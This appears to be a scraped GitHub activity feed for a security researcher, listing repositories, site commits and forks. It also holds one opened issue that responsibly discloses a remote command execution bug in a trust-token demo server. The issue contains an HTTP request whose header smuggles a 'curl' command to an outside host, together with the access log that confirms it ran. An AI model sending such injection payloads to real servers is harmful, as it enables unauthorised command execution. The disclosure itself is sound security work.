profile
viewpoint
Park Jung-hwan AhnMo Korea, Republic of http://pagez.kr/ https://fb.me/ahnmo.park

spostman/ppp-ccs2018 18

An investigative study on the security and privacy aspects of Progressive Web Apps

ryuneeee/wsd_linebot 2

Javascript document type LINE bot with Node.js sandbox VM based.

AhnMo/aosp_build 0

AOSP Build system compatible version of Open GApps

AhnMo/CoinHive-blocker 0

Clone of CoinHive-blocker. For evaluation.

push eventAhnMo/ahnmo.github.io

Junghwan Park

commit sha 1c73ed4d1d3e3f89eb9d85e75b4912423f1c48d1

Temp

view details

push time in a month

create barnchAhnMo/ahnmo.github.io

branch : cf

created branch time in a month

delete branch AhnMo/ahnmo.github.io

delete branch : verify

delete time in a month

delete branch AhnMo/ahnmo.github.io

delete branch : gh-pages

delete time in a month

push eventAhnMo/ahnmo.github.io

Junghwan Park

commit sha cb0d2a8de0eea259e3dab7b45174fbd677f4e321

Update _config.yml

view details

push time in a month

push eventAhnMo/ahnmo.github.io

Junghwan Park

commit sha 43703d8986286363348b27a287047e13a0800f34

Update _config.yml

view details

Junghwan Park

commit sha 546a98385dcd49e16700241372c2a1f049f9163c

Merge branch 'gh-pages' of github.com:AhnMo/ahnmo.github.io into gh-pages

view details

push time in a month

push eventAhnMo/ahnmo.github.io

Junghwan Park

commit sha 2d737a51c723a26719242c2a27418d686dcddd23

temp

view details

push time in a month

push eventAhnMo/ahnmo.github.io

Junghwan Park

commit sha 34c3ec21b92d2e844adf9daaed81abb1808d0f46

temp

view details

push time in a month

create barnchAhnMo/ahnmo.github.io

branch : verify

created branch time in a month

push eventAhnMo/ahnmo.github.io

Park Jung-hwan

commit sha 3c80247c1c07036be2d0ddb8c41753a018607e50

Rename .well-known/cf-2fa-verify.txt to .nojekyll/.well-known/cf-2fa-verify.txt

view details

push time in a month

push eventAhnMo/ahnmo.github.io

Park Jung-hwan

commit sha 2a28d64ec0c099e985b10b412893b8a6270f54ca

Update _config.yml

view details

Park Jung-hwan

commit sha f66c428af84dfba50c6ba1364f75c9878f206ed4

Update resume.html

view details

Park Jung-hwan

commit sha 06adf4d0a1eea3ae85aee1d5ab3ab19533ca441b

Create cf-2fa-verify.txt

view details

push time in a month

push eventAhnMo/ahnmo.github.io

Park Jung-hwan

commit sha 06adf4d0a1eea3ae85aee1d5ab3ab19533ca441b

Create cf-2fa-verify.txt

view details

push time in a month

fork AhnMo/password-cracking

This details how I create and use my password cracking setup

fork in a month

startedFirework471/ClickScanner

started time in a month

issue openedJackJey/trust-token-issuer-demo

Security Report - Remote Command Execution

Overview

I tried to test trust token api, however I found remote command execution point and confirmed. The server could be abused by this, so you need to fix by using execFile instead of exec.

Vulnable code

https://github.com/JackJey/trust-token-issuer-demo/blob/544e0b2f5d2e77be573acb7d525294d2507cb230/server.js#L51

Reproduce step

  • Reqeust as below:
POST /.well-known/trust-token/issuance HTTP/2
Host: trust-token-issuer-demo.glitch.me
Sec-Trust-Token: 123; curl http://alice.pagez.kr

  • curl http://alice.pagez.kr is executed and I found the access log as belew:
54.174.102.90 - - [29/Sep/2021:07:38:04 +0000] "GET / HTTP/1.1" 200 3106 "-" "curl/7.47.0"

created time in 2 months

startedWOOSEUNGHOON/V0Finder-public

started time in 3 months

fork AhnMo/www-project-web-security-testing-guide

The Web Security Testing Guide (WSTG) Project produces the premier cybersecurity testing resource for web application developers and security professionals.

https://owasp.org/www-project-web-security-testing-guide/

fork in 3 months

more